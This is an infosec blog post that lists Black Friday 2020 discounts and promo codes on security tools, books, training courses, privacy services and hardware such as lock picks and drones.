Do you have any more questions on how to perform threat modeling? Please feel free to contact us using the contact page regarding any concerns.

Bookmark
ClosePlease login

InfoSec Black Friday Deals 2020

By
Steven Black (n0tst3)
-
0
3760350 blackfriday generic promothumb3 1
3760350 blackfriday generic promothumb3 1

LOTS of deals for InfoSec related software/tools this Black Friday / Cyber Monday

FAQ

When do these sales end?

Most end 29/30th November.

When will most of the deals/discounts be here?

Most likely 27th midday for USA, 28th November for the rest of the world, check back often!

Can I add deals to the page?

Sorry no.

*Disclaimer: I have included my own, and other discount codes sent in directly.

Hacker Essentials

Stickermule
https://www.stickermule.com/deals
$19 down from $65, free shipping

Tools

GRAYHATWARFARE (Cloud Storage Buckets Search Engine) 
https://buckets.grayhatwarfare.com/packages
Up to 50% off

Burp Bounty Pro Extension
https://order.shareit.com/cart/view
20% off with code: CYBERBOUNTY

Pulsedive Threat Intelligence 
https://pulsedive.com/about/pro
$5 PRO accounts with code: TRYFOR5

Tenable
https://www.tenable.com/buy
50% off Nessus PRO with code: takehalf

WPScan
https://wpscan.com/
25% off Starter and Pro accounts with code: BLACKFRIDAY2020

Books:

NoStarch Press
https://nostarch.com/
33.7% off + free shipping with code BLACKFRIDAY20
*domestic orders only, $50 min

Cybrary (Hacking Training/Platform – online)
https://www.cybrary.it/
70% discount

O’Reilly Books
https://www.oreilly.com/online-learning/cybermonday-2019.html
50% discount with code: CM19CS

Apress
https://www.apress.com/us/shop/cybermonday-sale
All eBooks $6.99 each with code: CYBER20AP

Pearson
https://www.pearsonitcertification.com/promotions/booksgiving-buy-2-plus-books-or-ebooks-save-55-142246
Buy 2, save 55% + free US shipping with code: BOOKSGIVING

Humble Bundle
https://www.humblebundle.com/ 45% off Premium

Courses & Training:

OffSec AWAE 
https://www.offensive-security.com/awae-oswe/
Various discounts per labs length

Udemy (Hacking Training – online)
https://www.udemy.com
All courses $10.99

PluralSight
https://www.pluralsight.com/offer/2020/bf-cm-40-off
40% discount

Lets Defend
http://letsdefend.io/ 50% off with code: BLCKFRDY

PentesterLab (Hacking Training/Platform – online)  \ https://pentesterlab.com/pro/
https://twitter.com/PentesterLab/status/1331731252756373505
One-year: US$146.52 instead of US$199.99 Student (3-month): US$27.99 instead of US$34.99

DroneSec (Drone Security Training – online unlocks 1st December) 
https://training.dronesec.com
65% discount on bundle with code: DONOTSHAREBLACKFRI
20% discount on live training with code: BF20

Social Engineering Training 
(Robin Dreeke, retired FBI Special Agent and Chief of the Counterintelligence Behavioral Analysis Program)
https://www.peopleformula.com/online-training
25% discount with code: infosec25

CloudGuru (was Linux Academy)
https://acloudguru.com/pricing
Various deals

Zero2Automated Malware Analysis Course
https://courses.zero2auto.com/beginner-bundle
20% off with code: BLACKFRIDAYSALES

Practical DevSecOps
https://www.practical-devsecops.com/black-friday/
15% off

OSINTion Training
https://blackfriday.theosintion.com/ 33% off courses with code: 2020BF1337OSINT

OSINT Combine 
https://academy.osintcombine.com/ 40% off all courses with code: BLACKFRIDAY

Whizlabs
https://www.whizlabs.com/
50% off all products with code: BLACKFRIDAY50

ISACA
https://www.isaca.org/go/flash
15% off CISA/CISM/CRISC training & certs

Kaplan
https://www.kaptest.com/study/gre/black-friday-and-cyber-monday-gre-deals/
Claim deals are incoming shortly…

Networkdefense.io
https://www.networkdefense.io/library/
Claimed deals incoming…

International Cybersecurity Institute
https://www.icsi.co.uk/pages/black-friday-offer 50% off courses with code: BF50

Services:

ProtonMail
https://protonmail.com/blog/black-friday-2020/
33-50% discounts

NordVPN
https://nordvpn.com/offer/great-deal/
68% discount + 3 months free

F-Secure TOTAL and FREEDOME VPN
https://www.f-secure.com/en/home/products/total 50% off with code: BLACKWEEK

1Password
https://1password.com/promo/black-friday/the-verge/
50% off family account

Lowendbox
https://lowendbox.com/blog/lowendbox-has-mind-blowing-offers-coming-this-black-friday-cyber-monday-season/ Variety of deals

Hardware:

DJI 
https://store.dji.com/event/black-friday-sale-2020
Up to 46% off Osmo Action $199 down from $369

SouthOrdPicks
https://www.southord.com/
25% discount with code: CHEER25

SOS Soultions (Hardware Kits)
https://www.sossolutions.nl/black-friday-2020 Various discounts

Most deals https://github.com/0x90n/InfoSec-Black-Friday

Bookmark
ClosePlease login
1...707172...79Page 71 of 79

Editor Picks

Featured

Cyber Academy

ABOUT US

RiSec represents an autonomous, non-profit alliance comprising of individuals dedicated to enhancing cybersecurity awareness and education. Read more

Contact us: security@realinfosec.net

Social

Subscribe for weekly updates

Copyright © RiSec 2023 All rights reserved.
All trademarks, logos, images and brand names are the property of their respective owners.